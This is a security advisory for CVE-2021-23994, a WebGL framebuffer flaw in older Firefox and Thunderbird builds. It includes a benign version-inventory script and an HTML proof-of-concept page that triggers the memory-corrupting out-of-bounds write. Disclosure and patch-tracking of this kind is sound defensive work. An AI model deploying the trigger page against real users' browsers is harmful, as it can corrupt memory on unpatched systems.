
CVE-2021-23994

HIGH Severity

A WebGL framebuffer was not initialized early enough, resulting in memory corruption and an out-of-bounds write. This vulnerability affects Firefox ESR < 78.10, Thunderbird < 78.10, and Firefox < 88.
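The affected ranges above are per branch, so a patched ESR build (78.10 or later) must not be flagged just because its number is below 88. The following inventory check is an added example, not part of the advisory or of Mozilla's code; the record shape (`host`, `product`, `version`), the host names, and the assumption that ESR builds keep their `esr` version suffix are all hypothetical.

```javascript
// Added example: fixed-in versions are taken from the advisory text above.
const FIXED = {
  'firefox': [88],          // Firefox < 88 is affected
  'firefox-esr': [78, 10],  // Firefox ESR < 78.10 is affected
  'thunderbird': [78, 10],  // Thunderbird < 78.10 is affected
};

// Parse "78.9.1esr" -> { parts: [78, 9, 1], esr: true }; null if unparseable.
function parseVersion(raw) {
  const m = /^(\d+(?:\.\d+)*)(esr)?$/i.exec(String(raw).trim());
  if (!m) return null;
  return { parts: m[1].split('.').map(Number), esr: Boolean(m[2]) };
}

// Component-wise comparison; missing components count as 0 (88 == 88.0.0).
function compareParts(a, b) {
  for (let i = 0; i < Math.max(a.length, b.length); i++) {
    const d = (a[i] || 0) - (b[i] || 0);
    if (d !== 0) return d < 0 ? -1 : 1;
  }
  return 0;
}

// Returns 'affected', 'fixed', or 'unknown' for one inventory record.
function classify(record) {
  const v = parseVersion(record.version);
  const product = String(record.product).toLowerCase();
  if (!v || !(product === 'firefox' || product === 'thunderbird')) return 'unknown';
  // ESR builds must be compared against the ESR branch, not against 88.
  const key = product === 'firefox' && v.esr ? 'firefox-esr' : product;
  return compareParts(v.parts, FIXED[key]) < 0 ? 'affected' : 'fixed';
}

// Constructed sample inventory (hypothetical hosts, not real data).
const inventory = [
  { host: 'ws-01', product: 'firefox', version: '87.0' },
  { host: 'ws-02', product: 'firefox', version: '78.10.0esr' },
  { host: 'ws-03', product: 'firefox', version: '78.9.0esr' },
  { host: 'ws-04', product: 'thunderbird', version: '78.9.1' },
  { host: 'ws-05', product: 'firefox', version: '88.0' },
];

// Hosts whose installed build falls inside one of the affected ranges.
function affectedHosts(records) {
  return records.filter((r) => classify(r) === 'affected').map((r) => r.host);
}

console.log(affectedHosts(inventory));
```

Feed this from installed-package or application version data rather than from User-Agent strings, which carry only the major version and cannot separate 78.9 from 78.10.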

Proof of Concept
<!DOCTYPE html>
<html>
<body>
<canvas id="canvas3" width="1024" height="1024"></canvas>

<script>
var canvas = document.getElementById('canvas3');
var gl3 = canvas.getContext('webgl2', {  alpha:false, antialias:false } );
var fBuffer3 = gl3.createFramebuffer();
gl3.bindFramebuffer(gl3.DRAW_FRAMEBUFFER, fBuffer3);
var fBuffer4 = gl3.createFramebuffer();
gl3.bindFramebuffer(gl3.READ_FRAMEBUFFER, fBuffer4);
var rBuffer3 = gl3.createRenderbuffer();
gl3.bindRenderbuffer( gl3.RENDERBUFFER, rBuffer3 );
gl3.framebufferRenderbuffer( gl3.READ_FRAMEBUFFER, gl3.COLOR_ATTACHMENT0, gl3.RENDERBUFFER, rBuffer3 );
gl3.deleteFramebuffer(fBuffer4);
gl3.drawBuffers([gl3.COLOR_ATTACHMENT0]);
</script>

</body>
</html>

Risk Information

CVE ID
CVE-2021-23994

Vendor
Mozilla

Product
Firefox

CVSS SCORE
8.8

Advisories
Vendor Advisory
NVD